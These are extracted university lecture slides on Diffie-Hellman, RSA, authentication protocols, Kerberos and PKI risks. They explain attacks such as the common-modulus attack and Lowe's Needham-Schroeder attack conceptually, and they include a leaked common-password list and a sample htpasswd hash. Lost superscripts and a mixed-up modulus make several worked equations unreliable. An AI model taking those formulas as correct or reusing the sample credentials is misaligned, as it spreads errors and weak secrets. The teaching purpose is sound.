CIS 433/533: Computer and Network Security

3

Diffie-Hellman Key Agreement
• The DH paper really started the modern age of

cryptography, and indirectly the security community
‣ Negotiate a secret over an insecure media
‣ E.g., “in the clear” (seems impossible)
‣ Idea: participants exchange intractable puzzles that can

be solved easily with additional information

• Mathematics are very deep
‣ Working in multiplicative group G
‣ Use the hardness of computing

discrete logarithms in finite field
to make secure
‣ Things like RSA are variants that exploit similar properties
CIS 433/533: Computer and Network Security

4

Definitions (Num. Theory)
• Field: set of numbers closed under addition and

multiplication (also associative and commutative)
• Finite Field: field with finite elements: a set of

numbers modulo p
• Multiplicative Group modulo p: finite field plus

multiplication operation (numbers 1, ... p-1)
• Subgroup: some elements of a group: if group

operation applied, element still in subgroup
‣ e.g., additive group mod 8, set {0, 2, 4, 6} forms

subgroup
CIS 433/533: Computer and Network Security

5

Diffie-Hellman Protocol
• For two participants p1 and p2
• Setup: We pick a prime number p and a base g (<p)
‣ This information is public
‣ E.g., p=23, g=5

• Step 1: Each principal picks a private value x (<p-1)
• Step 2: Each principal generates and communicates

a new value
y = gx mod p
• Step 3: Each principal generates the secret shared
key z
z = yx mod p
• Perform a neighbor exchange.
CIS 433/533: Computer and Network Security

6

Diffie-Hellman
Params: p=23, g=5 (public values)
Alice

Bob

Private: xA = 6

Private: xB = 15

YA = gxA mod p
= 56 mod 23
=8

YB = gxB mod p
= 515 mod 23
= 19

Z = YBx mod p
= 196 mod 23
=2

Z = YAx mod p
= 815 mod 23
=2

CIS 433/533: Computer and Network Security

7

Attacks on Diffie-Hellman
• This is key agreement, not authentication.
‣ You really don’t know anything about who you have

exchanged keys with
‣ The man in the middle …

A

B

‣ Alice and Bob think they are talking directly to each other,

but Mallory is actually performing two separate exchanges

• You need to have an authenticated DH exchange
‣ e.g., out of band
CIS 433/533: Computer and Network Security

8

D-H Subtleties
• Generator: gi generates elements in group
• Primitive element: there is some i such that g

generates all elements in a group
• Weakness: if g is not a primitive element of the

group then only a small subgroup may be
generated
• Solution: safe primes
‣ prime p of form 2q +1 where q prime
‣ subgroups now {1}, {1, p-1}, size q, size 2q
‣ 2, 5 are good values for generators
CIS 433/533: Computer and Network Security

9

Public Key Cryptography
• Each key pair consists of a public and

private component: k+ (public key), k(private key)
+

D(E(p, k ), k ) = p

D(E(p, k ), k ) = p


+

• Public keys are distributed (typically)

through public key certificates
‣ Anyone can communicate secretly with you if

they have your certificate
‣ E.g., SSL-based web commerce
CIS 433/533: Computer and Network Security

10

RSA (Rivest, Shamir, Adelman)
• A dominant public key algorithm
‣ The algorithm itself is conceptually simple
‣ Why it is secure is very deep (number theory)
‣ Use properties of exponentiation modulo a product of

large primes

“A method for obtaining
Digital Signatures and
Public Key Cryptosystems”,
Communications of the
ACM, Feb., 1978 21(2)
pages 120-126.
CIS 433/533: Computer and Network Security

11

RSA Key Generation
• Pick two large primes p and q
• Calculate n = pq
• Pick e such that it is relatively

prime to phi(n) = (q-1)(p-1)
‣ “Euler’s Totient Function”

• d ~= e-1 mod phi(n)

de mod phi(n) = 1

CIS 433/533: Computer and Network Security

1. p=3, q=11
2. n = 3*11 = 33
3. phi(n) = (2*10) = 20
4. e = 7 | GCD(20,7) = 1

or

5. “Euclid’s Algorithm”
d = 7-1 mod 20
d | d7 mod 20 = 1
d=3

12

RSA Encryption/Decryption
• Public key k+ is {e,n} and private key k- is {d,n}
• Encryption and Decryption

E(k+,P) : ciphertext = plaintexte mod n
D(k-,C) : plaintext = ciphertextd mod n
• Example
‣ Public key (7,33), Private Key (3,33)
‣ Data “4” (encoding of actual data)

‣ E({7,33},4) = 47 mod 33 = 16384 mod 33 = 16
‣ D({3,33},16) = 163 mod 33 = 4096 mod 33 = 4
CIS 433/533: Computer and Network Security

13

RSA Recap
• Pick two primes: p, q
• Modulus n = pq
• Euler’s totient ϕ(n) = (p-1)(q-1)
• Public exponent e selected s.t. gcd(e,ϕ(n)) = 1
• Private exponent d = e-1 mod ϕ(n)
• For message m, ciphertext c, plaintext p
‣ c = me (mod n)
‣ p = cd (mod n)
CIS 433/533: Computer and Network Security

14

Encryption using private key …
• Encryption and Decryption

E(k-,P) : ciphertext = plaintextd mod n
D(k+,C) : plaintext = ciphertexte mod n
• E.g.,
‣ E({3,45},4) = 43 mod 33 = 64 mod 33 = 31
‣ D({7,45},19) = 317 mod 33 = 27,512,614,111 mod 33

=4

• Q: Why encrypt with private key?
CIS 433/533: Computer and Network Security

15

“Textbook” RSA
• Safe to use?
• NO!!
• “Multiplicative homomorphism”
‣ For c = E(m) = me mod(n)
‣ E(m1) * E(m2) = E(m1 * m2)

• Avoid structure by encoding values with PKCS#1
• Use different exponents for encryption and signing

(typically e=3 for enc., 5 for signing)
• don’t use small d, insecure (small exponent attack)
CIS 433/533: Computer and Network Security

16

Common Modulus Attack
• Alice uses n, ea
• Bob uses n, eb (i.e., share common modulus)
• If ea and eb are relatively prime then eavesdropper

Eve does the following:
ca

ea

=m

mod n

cb

= meb

mod n

• Use Euclidean algorithm to find r,s where

ea*r + eb*s = 1 (the e values are public)
• Now:

(m

ea

mod n) ∗ (m
r

= M ea ∗r+eb ∗s
=M
CIS 433/533: Computer and Network Security

eb

mod n)

s

mod n

mod n
17

Digital Signatures
• Models physical signatures in digital world
‣ Association between private key and document
‣ … and indirectly identity and document.
‣ Asserts that document is authentic and non-reputable
• To sign a document
‣ Given document d, private key k‣ Signature S(d) = E( k-, h(d) )

• Validation
‣ Given document d, signature S(d), public key k+
‣ Validate D(k+, S(d)) = H(d)
CIS 433/533: Computer and Network Security

18

Secret vs. public key crypto.
• Secret key cryptography

• Public key cryptography
Each key pair consists of a public and
‣ Symmetric keys, where A single
key (k) is used is used for E and D private component:
‣ D( E( p, k ), k ) = p

• All (intended) receivers have

access to key
• Note: Management of keys

k+ (public key), k- (private key)
D( E(p, k+), k- ) = p
D( E(p, k-), k+ ) = p

determines who has access to
encrypted data
• Public keys are distributed (typically)
‣ E.g., password encrypted email

• Also known as symmetric key

cryptography
CIS 433/533: Computer and Network Security

through public key certificates
– Anyone can communicate secretly
with you if they have your certificate
– E.g., SSL-based web commerce
19

Meet Alice and Bob ….
• Alice and Bob are the canonical players in the

cryptographic world.
‣ They represent the end points of some interaction
‣ Used to illustrate/define a security protocol

• Other players occasionally join …
‣ Trent - trusted third party
‣ Mallory - malicious entity
‣ Eve - eavesdropper
‣ Ivan - an issuer (of some object)
CIS 433/533: Computer and Network Security

20

Some notation …
• You will generally see protocols defined in terms of

exchanges containing some notation like
‣ All players are identified by their first initial
• E.g., Alice=A, Bob=B
‣ d is some data
‣ pwA is the password for A
‣ kAB is a symmetric key known to A and B
‣ KA+,KA- is a public/private key pair for entity A
‣ E(k,d) is encryption of data d with key k
‣ H(d) is the hash of data d
‣ Sig(KA-,d) is the signature (using A’s private key) of data d
‣ “+” is used to refer to concatenation
CIS 433/533: Computer and Network Security

21

Some interesting things you want to do …
• … when communicating.
‣ Ensure the

authenticity of a user
‣ Ensure the

integrity of the data
• Also called data

authenticity

‣ Keep data

confidential
‣ Guarantee

non-repudiation

CIS 433/533: Computer and Network Security

22

Basic (User) Authentication
• Bob wants to authenticate Alice’s identity
‣ (is who she says she is)

[pwA]
1

Alice

Bob
2

[Y/N]
CIS 433/533: Computer and Network Security

23

Hash User Authentication
• Bob wants to authenticate Alice’s identity
‣ (is who she says she is)

[h(pwA)]
1

Alice

Bob
2

[Y/N]
CIS 433/533: Computer and Network Security

24

Challenge/Response User Authentication
• Bob wants to authenticate Alice’s identity
‣ (is who she says she is)

[c]

Alice

2

1

[h(c+pwA)]

Bob
3

[Y/N]
CIS 433/533: Computer and Network Security

25

User Authentication vs. Data Integrity
• User authentication proves a property about the

communicating parties
‣ E.g., I know a password

• Data integrity ensures that the data transmitted...
‣ Can be verified to be from an authenticated user
‣ Can be verified to determine whether it has

been modified
• Now, lets talk about the latter,

data integrity
CIS 433/533: Computer and Network Security

26

Simple Data Integrity?
• Alice wants to ensure any modification of the data in

flight is detectable by Bob (integrity)

Alice

1

CIS 433/533: Computer and Network Security

[d,h(d)]
Bob

27

HMAC Integrity
• Alice wants to ensure any modification of the data in

flight is detectable by Bob (integrity)

Alice

1

[d,HMAC(k,d)]

CIS 433/533: Computer and Network Security

Bob

28

Signature Integrity
• Alice wants to ensure any modification of the data in

flight is detectable by Bob (integrity)

Alice

1

[d, Sig(KA-, d)]

CIS 433/533: Computer and Network Security

Bob

29

Data Integrity vs. Non-repudiation
• If the integrity of the data is preserved, is it provably

from that source?
‣ Hash integrity says what about non-repudiation?
‣ Signature integrity says what about non-repudiation?

CIS 433/533: Computer and Network Security

30

Confidentiality
•! Alice wants to ensure that the data is not exposed to
anyone except the intended recipient (confidentiality)

[E(kAB,d), HMAC(kAB, d)]
Alice

1

CIS 433/533: Computer and Network Security

Bob

31

Question
• If I already have an authenticated channel (e.g., the

remote party’s public key), why don’t I simply make
up a key and send it to them?

CIS 433/533: Computer and Network Security

32

Confidentiality
•! Alice wants to ensure that the data is not exposed to
anyone except the intended recipient (confidentiality)
•! But, Alice and Bob have never met!!!!

[E(kx,d), hmac(kx, d),E(KB+,kx)]
Alice

1

Bob

•! Alice randomly selects key kx to encrypt with
CIS 433/533: Computer and Network Security

33

Real Systems Security
• The reality of the security is that 90% of the

frequently used protocols use some variant of these
constructs.
‣ So, get to know them … they are your friends
‣ We will see them (and a few more) over the term

• They also apply to systems construction
‣ Protocols need not necessarily be online
‣ Think about how you would use these constructs to secure

files on a disk drive (integrity, authenticity, confidentiality)
‣ We will add some other tools, but these are the basics
CIS 433/533: Computer and Network Security

34

Cryptanalysis and Protocol Analysis
• Cryptographic Algorithms
‣ Complex mathematical concepts
‣ May be flawed
‣ What approaches are used to prove correct/find flaws?

• Cryptographic Protocols
‣ Complex composition of algorithms and messages
‣ May be flawed
‣ What approaches are used to prove correct/find flaws?
CIS 433/533: Computer and Network Security

35

A Protocol Story
• Needham-Schroeder Public Key Protocol
‣ Defined in 1978

• Assumed Correct
‣ Many years without a flaw being discovered

• Proven Correct
‣ BAN Logic

• So, It’s Correct, Right?

CIS 433/533: Computer and Network Security

36

Needham-Schroeder Public Key
• Does It Still Look OK?

• Message a.1:

Nonce

A --> B : A,B, {NA, A}PKB

‣ A initiates protocol with fresh value for B

• Message a.2:

B --> A : B,A, {NA, NB}PKA

‣ B demonstrates knowledge of NA and challenges A

• Message a.3:

A --> B : A,B, {NB}PKB

‣ A demonstrates knowledge of NB

• A and B are the only ones who can read NA and NB
CIS 433/533: Computer and Network Security

37

Gavin Lowe Attack
• An active intruder X participates...
• Message a.1:
• Message b.1:

A --> X : A,X, {NA, A}PKX
X(A) --> B : A,B, {NA, A}PKB

‣ X as A initiates protocol with fresh value for B

• Message b.2:
• Message a.2:

B --> X(A) : B,A, {NA, NB}PKA
X --> A : X,A, {NA, NB}PKA

‣ X asks A to demonstrates knowledge of NB

• Message a.3:

A --> X : A,X, {NB}PKX

‣ A tells X NB; thanks A!

• Message b.3:

X(A) --> B : A,B, {NB}PKB

‣ X completes the protocol as A
CIS 433/533: Computer and Network Security

38

What Happened?
• X can get A to act as an “oracle” for nonces
‣ Hey A, what’s the NB in this message from any B?

• A assumes that any message encrypted for it is legit
‣ Bad idea

• X can enable multiple protocol executions to be

interleaved
‣ Should be part of the threat model?

CIS 433/533: Computer and Network Security

39

Dolev-Yao Result
• Strong attacker model
‣ Attacker intercepts every message
‣ Attacker can cause one of a set of operators to be
applied at any time
• Operators for modifying, generating any kind of message

‣ Attacker can apply any operator except other’s

decryption
• Common model to show security against

CIS 433/533: Computer and Network Security

40

Basic truths of cryptography …
• Cryptography is not

frequently the source of
security problems
‣ Algorithms are well known

and widely studied
• Use of crypto commonly is …

(e.g., WEP)

‣ Vetted through crypto

community
‣ Avoid any “proprietary”
encryption
‣ Claims of “new technology”
or “perfect security” are
almost assuredly snake oil
CIS 433/533: Computer and Network Security

41

Why Cryptosystems Fail
• Typically, not because of crypto algorithms

CIS 433/533: Computer and Network Security

42

ATMs
• Consider ATM systems
‣ some public data, also some high value information
‣ banks tend to be interested in security

• How do they work?
‣ Card: with account number
‣ User: provides PIN
‣ ATM: verifies that PIN corresponds to encryption of

account number with PIN key (offset can be used)

• Foundation of security: PIN key
‣ This is a trusted part of the system
CIS 433/533: Computer and Network Security

43

ATM Fraud
• Insiders
‣ Make extra card; special ops allow debit of any account

• Outsiders
‣ Shoulder surfing; fake ATMs, replay pay response

• PINs
‣ Weak entropy of PIN keys; limit user PIN choices; same

PIN for everyone

• User-chosen PINs
‣ Bad; Store encrypted in a file (find match);

Encrypted on card
CIS 433/533: Computer and Network Security

44

Fake & Compromised ATMs
• China, 2010: fake ATMs

that look real but give
error messages when a
card put in
• Russia: March 2009
‣ criminals install a Trojan on

Diebold ATMs
‣ Skimmer-A code steals

PINs from cards entered in
machine and skims money
in a variety of currencies
CIS 433/533: Computer and Network Security

45

More Complex Issues
• PIN key derivation
‣ Set terminal key from two shares
‣ Download PIN key encrypted under terminal key

• Other banks’ PIN keys
‣ Encrypt ‘working keys’ under a zone key
‣ Re-encrypt under ATM bank’s working key

• Must keep all these keys secret

CIS 433/533: Computer and Network Security

46

Product Insecurity
• Despite well understood crypto foundations,

products don’t always work securely
‣ Lose secrets due to encryption in software
‣ Incompatibilities (borrow my terminal)
‣ Poor product design
• Back doors enabled, non-standard crypto, lack of entropy, etc.

‣ Sloppy operations
• Ignore attack attempts, share keys, procedures are not defined

or followed

‣ Cryptanalysis sometimes
• Home-grown algorithms!, improper parameters, cracking DES
CIS 433/533: Computer and Network Security

47

Problems
• Systems may work in general, but...
‣ Are difficult to use in practice
‣ Counter-intuitive
‣ Rewards aren’t clear
‣ Correct usage is not clear
‣ Too many secrets ultimately

• Fundamentally, two problems
‣ Too complex to use
‣ No way to determine if use is correct
CIS 433/533: Computer and Network Security

48

Solutions?
• Suggestions from Anderson:
‣ Determine exactly what can go wrong
• Find all possible failure modes

‣ Put in safeguards
• Describe how preventions protect system

‣ Correct implementation of safeguards
• Implementation of preventions meets requirements

‣ Decisions left to people are small in number and clearly

understood
• People know what to do

• These are general problems of security!
CIS 433/533: Computer and Network Security

49

System Design Principles
• Don’t design your own crypto algorithm
‣ Use standards whenever possible

• Make sure you understand parameter choices
• Make sure you understand algorithm interactions
‣ E.g. the order of encryption and authentication (in certain

instances, authenticate then encrypt is risky)

• Be open with your design
‣ Solicit feedback
‣ Use open algorithms and protocols
‣ Open code? (jury is still out)
CIS 433/533: Computer and Network Security

50

Common issues that lead to pitfalls
• Generating randomness
• Storage of secret keys
• Virtual memory (pages

secrets onto disk)
• Protocol interactions
• Poor user interface
• Poor choice of key length,

prime length, using
parameters from one
algorithm in another
CIS 433/533: Computer and Network Security

51

CIS 433/533 - Computer and
Network Security
Authentication
Professor Butler
Winter 2011
Computer and Information Science

What is Authentication?
• Short answer: establishes identity
‣ Answers the question: To whom am I
speaking?
• Long answer: evaluates the authenticity of

identity proving credentials
‣ Credential – is proof of identity
‣ Evaluation – process that assesses the

correctness of the association between
credential and claimed identity
• for some purpose
• under some policy (what constitutes a good cred.?)
CIS 433/533: Computer and Network Security

2

Why authentication?
• Well, we live in a world of rights, permissions,

and duties?
‣ Authentication establishes our identity so that we

can obtain the set of rights
‣ E.g., we establish our identity with Tiffany’s by

providing a valid credit card which gives us rights
to purchase goods ~ physical authentication
system

• Q: How does this relate to security?
CIS 433/533: Computer and Network Security

3

Why authentication? (cont.)
• Same in online world, just different

constraints
‣ Vendor/customer are not physically co-located, so

we must find other ways of providing identity
• e.g., by providing credit card number ~ electronic

authentication system
‣ Risks (for customer and vendor) are different
• Q: How so?

• Computer security is crucially dependent on

the proper design, management, and
application of authentication systems.
CIS 433/533: Computer and Network Security

4

What is Identity?
• That which gives you access … which is largely

determined by context
‣ We all have lots of identities
‣ Pseudo-identities

• Really, determined by who is evaluating credential
‣ Driver’s License, Passport, SSN prove …
‣ Credit cards prove …
‣ Signature proves …
‣ Password proves …
‣ Voice proves …

• Exercise: Give an example of bad mapping between

identity and the purpose for which it was used.
CIS 433/533: Computer and Network Security

5

Credentials
• … are evidence used to prove identity
• Credentials can be
‣ Something I am
‣ Something I have
‣ Something I know

CIS 433/533: Computer and Network Security

6

Something you know …
• Passport number, mothers maiden name, last 4

digits of your social security, credit card number
• Passwords and pass-phrases
‣ Note: passwords are generally pretty weak
• University of Michigan: 5% of passwords were goblue
• Passwords used in more than one place

‣ Not just because bad ones selected: If you can remember

it, then a computer can guess it
• Computers can often guess very quickly
• Easy to mount offline attacks
• Easy countermeasures for online attacks
CIS 433/533: Computer and Network Security

7

Something you have …
• Tokens (transponders, …)
‣ Speedpass, EZ-pass
‣ SecureID

• Smartcards
‣ Unpowered processors
‣ Small NV storage
‣ Tamper resistant

• Digital Certificates (used by Websites to

authenticate themselves to customers)
‣ More on this later …
CIS 433/533: Computer and Network Security

8

Something you are …
• Biometrics measure some physical characteristic
‣ Fingerprint, face recognition, retina scanners, voice,

signature, DNA
‣ Can be extremely accurate and fast
‣ Active biometrics authenticate
‣ Passive biometrics recognize

• Issues with biometrics?
‣ Revocation – lost fingerprint?
‣ “fuzzy” credential, e.g., your face changes based on mood ...
‣ Great for physical security, not feasible for on-line systems
CIS 433/533: Computer and Network Security

9

Web Authentication
• Authentication is a bi-directional process
‣ Client
‣ Server
‣ Mutual authentication
• Several standard authentication tools
‣ Basic (client)
‣ Digest (client)
‣ Secure Socket Layer (server, mutual)
‣ Cookies (indirect, persistent)
• Q: Are cookies good credentials?
CIS 433/533: Computer and Network Security

10

How Basic Authentication Works …

CLIENT

GET /protected/index.html HTTP/1.0

HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm=“Private”
CLIENT
GET /protected/index.html HTTP/1.0
Authorization: Basic JA87JKAs3NbBDs

CLIENT
CIS 433/533: Computer and Network Security

11

Setting up Basic auth in Apache
• File in directory to protect (.htacess)
!!AuthType Basic
!!AuthName Kevin’s directories (User ID=butler)"
!!AuthUserFile /usr/butler/www-etc/.htpw1
!!AuthGroupFile /dev/null
!!require valid-user

• In /usr/butler/www-etc/.htpw1

!! butler:l7FwWEqjyzmNo
generated using htpasswd program
• Can use different .htaccess files for different directories
CIS 433/533: Computer and Network Security

12

Basic Authentication Problems
• Passwords easy to intercept
• Passwords easy to guess
‣ Just base-64 encoded

• Passwords easy to share
• No server authentication
‣ Easy to fool client into sending password to malicious

server

• One intercepted password gives eavesdropper

access to many documents
CIS 433/533: Computer and Network Security

13

Digest Authentication
GET /protected/index.html HTTP/1.1
CLIENT

CLIENT

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest
realm=“Private” nonce=“98bdc1f9f017..”
GET /protected/index.html HTTP/1.1
Authorization: Digest
username=“lstein” realm=“Private”
nonce=“98bdc1f9f017..” response=“5ccc069c4..”

CLIENT

CIS 433/533: Computer and Network Security

14

Challenge and Response
• Challenge (“nonce”): any changing string
‣ e.g. MD5(IP address:timestamp:server secret)

• Response: challenge hashed with user’s name &

password

‣ MD5(MD5(name:realm:password):nonce:MD5(request))

• Server-specific implementation options
‣ One-time nonces
‣ Time-stamped nonces
‣ Method authentication digests

CIS 433/533: Computer and Network Security

15

Advantages of Digest over Basic
• Cleartext password never transmitted across network
• Cleartext password never stored on server
• Replay attacks difficult
• Intercepted response only valid for a single URL
• Shared disadvantages
‣ Vulnerable to man-in-the-middle attacks
‣ Document itself can be sniffed

CIS 433/533: Computer and Network Security

16

Password Attacks
• Use of passwords in, for example, Kerberos is

susceptible to offline cracking
• Process:
‣ User enters password for Kerberized client
‣ Request (w/o password) forwarded to KDC
‣ Response is encrypted in key derived from user’s passwd
‣ Client generates key from password for decryption

• Attack: If you know what the message should say,

you can guess and test passwords
• PSU: we did this, recovered 35% of CSE passwds
• Can also spoof logins to recover passwds
CIS 433/533: Computer and Network Security

17

Password Attacks
• Dictionary attack
‣ Users not so good at picking high-entropy passwords
‣ Gawker:

2516 123456
2188 password
1205 12345678
696 qwerty
498 abc123
459 12345
441 monkey
413 111111
385 consumer
376 letmein
351 1234
318 dragon
307 trustno1

• Rainbow Table
‣ precomputed hash values: big
CIS 433/533: Computer and Network Security

18

A petard ...
• The rule of seven plus or minus two.
‣ George Miller observed in 1956 that

most humans can remember about 5-9
things more or less at once.
‣ Thus is a kind of maximal entropy that

one can hold in your head.
‣ This limits the complexity of the

passwords you can securely use, i.e.,
not write on a sheet of paper.
‣ A perfectly random 8-bit password has

less entropy than a 56-bit key.

• Implication?
CIS 433/533: Computer and Network Security

19

A question?
• Is there going to come a day where all

passwords are useless?
‣ Suppose I can remember 16 bytes of entropy

(possible?)
‣ Won’t there come a day when all passwords are

useless?
• Moore’s law and its corollaries?

CIS 433/533: Computer and Network Security

20

Answer: no
• Nope, you just need to make the process of

checking passwords more expensive. For example,
you can repeat the salted hash many times ...
‣ Linear cost speedup?

CIS 433/533: Computer and Network Security

21

Kerberos
• History: from UNIX to Networks (late 80s)
‣ Solves: password eavesdropping
‣ Online authentication
• Variant of Needham-Schroeder protocol

‣ Easy application integration API
‣ First single sign-on system (SSO)
‣ Genesis: rsh, rcp
• authentication via assertion

• Most widely used (non-web) centralized password

system in existence (and lately only...)
• Now: part of Windows 2K/XP/Vista network
authentication
CIS 433/533: Computer and Network Security

22

An aside …
• Authentication
‣ Assessing identity of users
‣ By using credentials …

• Authorization
‣ Determining if users have the right to perform requested

action (e.g., write a file, query a database, etc.)

• Kerberos authenticates users, but does not

perform any authorization functions …
‣ … beyond identify user as part of Realm
‣ Typically done by application.

• Q: Do you use any “Kerberized” programs?
‣ How do you know?
CIS 433/533: Computer and Network Security

23

The setup …
• The players
‣ Principal - person being authenticated
‣ Service (verifier) - entity requiring authentication (e.g,

AFS)
‣ Key Distribution Center (KDC)
• Trusted third party for key distribution
• Each principal and service has a Kerberos password known to

KDC, which is munged to make a password key, e.g., kA

‣ Ticket granting server
• Server granting transient authentication

• The objectives
‣ Authenticate Alice (Principal) to Bob (Service)
‣ Negotiate a symmetric (secret) session key kAB
CIS 433/533: Computer and Network Security

24

The protocol
• A two-phase process
1. User authentication/obtain session key (and ticket
granting ticket) key from Key Distribution Center
2. Authenticate Service/obtain session key for
communication with service

• Setup
‣ Every user and service get certified and assigns password
CIS 433/533: Computer and Network Security

25

A Kerberos Ticket
• A Kerberos ticket is a token where …
‣ Alice is the only one that can open it
‣ Contains a session key for Alice/Bob (KAB)
‣ Contains inside it a token that can only be opened by Bob

• Bob’s Ticket contains
‣ Alice’s identity
‣ The session key (KAB)

Ticket (KAB)
Ticket (KAB)
“Locked” by KB
“Locked” by KA

• Q: What if issuing service is not trusted?
CIS 433/533: Computer and Network Security

26

The protocol (obtaining a TGT)
• Timeexp - time of expiration
• n - nonce (random, one-use value: e.g., timestamp)

1

[A,TGS,Timeexp,n]

Alice

2

KDC

E(kA,[kA,TGS,TGS,Timeexp,n]),E(KTGS,[A, kA,TGS, Timeexp],)

TGT
CIS 433/533: Computer and Network Security

27

The protocol (performing authentication)

[B,Timeexp,n,E(kA,TGS,[B,Timeexp,n])], E(KTGS,[A,kA,TGS,Timeexp])]

Alice
3

1
2

TGS

E(kA,TGS,[kA,B,B,Timeexp,n]),
E(kB,[A,kA,B,Timeexp])
E(kB,[A,kA,B,Timeexp]),
E(kA,B,[A,Timeexp,n])

Bob

Authenticator
CIS 433/533: Computer and Network Security

28

Cross-Realm Kerberos
• Extend philosophy to more servers
‣ Obtain ticket from TGS for foreign Realm
‣ Supply to TGS of foreign Realm
‣ Rinse and repeat as necessary

UW

Oregon

OSU

Stanford

UCB

• “There is no problem so hard in computer science that it cannot

be solved by another layer of indirection.”


David Wheeler, Cambridge University (circa 1950)

CIS 433/533: Computer and Network Security

29

Kerberos Reality
• V4 was supposed to be replaced by V5
‣ But wasn’t because interface was ugly, complicated, and

encoding was infuriating

• Assumes trusted path between user and Kerberos
• Widely used in UNIX domains
• Robust and stable implementation

• Problem: trust ain’t transitive, so not so good for large

collections of autonomous enterprises
CIS 433/533: Computer and Network Security

30

Meeting Someone New
• Anywhere in the Internet

CIS 433/533: Computer and Network Security

31

What is a certificate?
• A certificate …
‣ … makes an association between a user identity/job/

attribute and a private key
‣ … contains public key information {e,n}
‣ … has a validity period
‣ … is signed by some certificate authority (CA)
‣ ... identity may have been vetted by a registration authority

(RA)

• Issued by CA for some purpose
‣ Verisign is in the business of issuing certificates
‣ People trust Verisign to vet identity
CIS 433/533: Computer and Network Security

32

What is a certificate?
• A certificate …
‣ … makes an association between a user identity/job/

attribute and a private key
‣ … contains public key information {e,n}
‣ … has a validity period
‣ … is signed by some certificate authority (CA)
‣ ... identity may have been vetted by a registration authority

(RA)

• Issued by CA for some purpose
‣ Verisign is in the business of issuing certificates
‣ People trust Verisign to vet identity
CIS 433/533: Computer and Network Security

32

Why do I trust the certificate?
• A collections of “root” CA certificates
‣ … baked into your browser
‣ … vetted by the browser manufacturer
‣ … supposedly closely guarded (yeah, right)

• Root certificates used to validate certificate
‣ Vouches for certificate’s authenticity

CA
CIS 433/533: Computer and Network Security

(signs)

Certificate
Signature
33

Public Key Infrastructure
• System to “securely distribute public keys

(certificates)”
‣ Q: Why is that hard?

• Terminology:
‣ Alice signs a certificate for Bob’s name and key
• Alice is issuer, and Bob is subject

‣ Alice wants to find a path to Bob’s key
• Alice is verifier, and Bob is target

‣ Anything that has a public key is a principal
‣ Anything trusted to sign certificates is a trust anchor
• Its certificate is a root certificate
CIS 433/533: Computer and Network Security

34

What is a PKI?
• Rooted tree of CAs

Root

• Cascading issuance
‣ Any CA can issue cert
‣ CAs issue certs for children

CA1

CA2

CA3




CA11 CA12 CA1n CA21
CA31

Cert11a Cert11b Cert11c

CIS 433/533: Computer and Network Security








35

Certificate Validation
Root
CA1

Certificate

CA2

CA3




CA11 CA12 CA1n CA21
CA22

Signature

Cert11a Cert11b Cert11c

CIS 433/533: Computer and Network Security








36

Certificate Validation
Root
CA1

Certificate

CA2

CA3




CA11 CA12 CA1n CA21
CA22

Signature

Cert11a Cert11b Cert11c

CIS 433/533: Computer and Network Security








36

Certificate Validation
Root
CA1

Certificate

CA2

CA3




CA11 CA12 CA1n CA21
CA22

Signature

Cert11a Cert11b Cert11c

CIS 433/533: Computer and Network Security








36

PKI and Revocation
• Certificate may be revoked before expiration
‣ Lost private key
‣ Compromised
‣ Owner no longer authorized

• Revocation is hard …
‣ The “anti-matter” problem
‣ Verifiers need to check revocation state
• Loses the advantage of off-line verification

‣ Revocation state must be authenticated
CIS 433/533: Computer and Network Security

37

PKI (Circa 2009/2010)
Verisign

Web.com

Google.com

CIS 433/533: Computer and Network Security

Amazon.com

...

x.com

38

10 Risks of PKI
• This is an overview of one of many perspectives of

PKI technologies
‣ PKI was, like many security technologies, claimed to be a

panacea
‣ It was intended to solve a very hard problem: build trust

on a global level
‣ Running a CA -- “license to print money”

• Basic premise:
‣ Assertion #1 - e-commerce does not need PKI
‣ Assertion #2 - PKI needs e-commerce

• Really talking about a full PKI (everyone has certs.)
CIS 433/533: Computer and Network Security

39

Risk 1 - Who do we trust, and for what?
• Argument: CA is not inherently trustworthy
‣ Why do/should you trust a CA?
‣ In reality, they defer all legal liability for running a bad CA
‣ Risk in the hands of the certificate holder

• Counter-Argument: Incentives
‣ Any CA caught misbehaving is going to be out of

business tomorrow
‣ This scenario is much worse than getting sued
‣ Risk held by everybody, which is what you want
• Everyone has reason to be diligent
CIS 433/533: Computer and Network Security

40

Risk 2 - Who is using my key?
• Argument: key is basically insecure
‣ Your key is vulnerable, deal with it
‣ In some places, you are being held responsible after a

compromise

• Counter-Argument: this is the price of technology
‣ You have to accept some responsibility in order to get

benefit
‣ Will encourage people to use only safe technology

• Q: what would happen if same law applied

to VISA?
CIS 433/533: Computer and Network Security

41

Aside: TEMPEST
• Transient Electromagnetic Pulse Surveillance Technology
‣ Monitor EMF emanations to reconstruct signal
‣ For example, a video monitor normally exist at around 55-245

MHz, and can be picked up as far as one kilometer away.
‣ ... or by a guy in a van across the street, e.g., steal private key.
• Generally, this is the domain of spy/national security issues
• Much classified work on signal eavesdropping and prevention

CIS 433/533: Computer and Network Security

42

Risk 3 - How secure is the verif(ier)?
• Argument: the computer that verifies your

credential is fundamentally vulnerable
‣ Everything is based on the legitimacy of the verifier root

public key (integrity of certificate files)
‣ Browsers transparently use certificates

• Counter-Argument: this is the price of technology
‣ You have to accept some risk in order to get benefit
‣ Will encourage people to use only safe technology

• Q: What’s in your browser?
CIS 433/533: Computer and Network Security

43

Risk 4 - Which John Robinson is he?
• Argument: identity in PKI is really too loosely defined
‣ No standards for getting credential
‣ No publicly known unique identifiers for people
‣ So, how do you tell people apart
‣ Think about Microsoft certificate

• Counter-Argument: due diligence
‣ Only use certificates in well known circumstances
‣ When in doubt, use other channels to help

• Q: Is this true of other valued items (checks?)
CIS 433/533: Computer and Network Security

44

Risk 5 - Is the CA an authority?
• Argument: there are things in certificates that claim

authenticity and authorization of which they have
no dominion
‣ “rights” (such as the right to perform SSL) - this confuses

authorization authority with authentication authority
‣ DNS, attributes -- the CA is not the arbiter of these

things

• Counter-Argument: this is OK, because it is part of

the implicit charge we give our CA -- we implicitly
accept the CA as authority in several domains
CIS 433/533: Computer and Network Security

45

Risks 6 and 7
• 6 : Is the user part of the design?
‣ Argument: too many things hidden in use, user has no ability

to affect or see what is going on
• Ex.: Hosted website has cert. of host(er), not page
‣ Counter-Argument: too sophisticated for user to understand

• 7 : Was it one CA or CA+RA?
‣ Argument: separation of registration from issuance allows

forgery
• e.g., RA handles vetting, CA makes certificates, so, you better have

good binding between these entities or bad things can happen

‣ Counter-Argument: this is an artifact of organization, only a

problem when CA is bad (you are doomed anyway)
CIS 433/533: Computer and Network Security

46

Risks 8 and 9
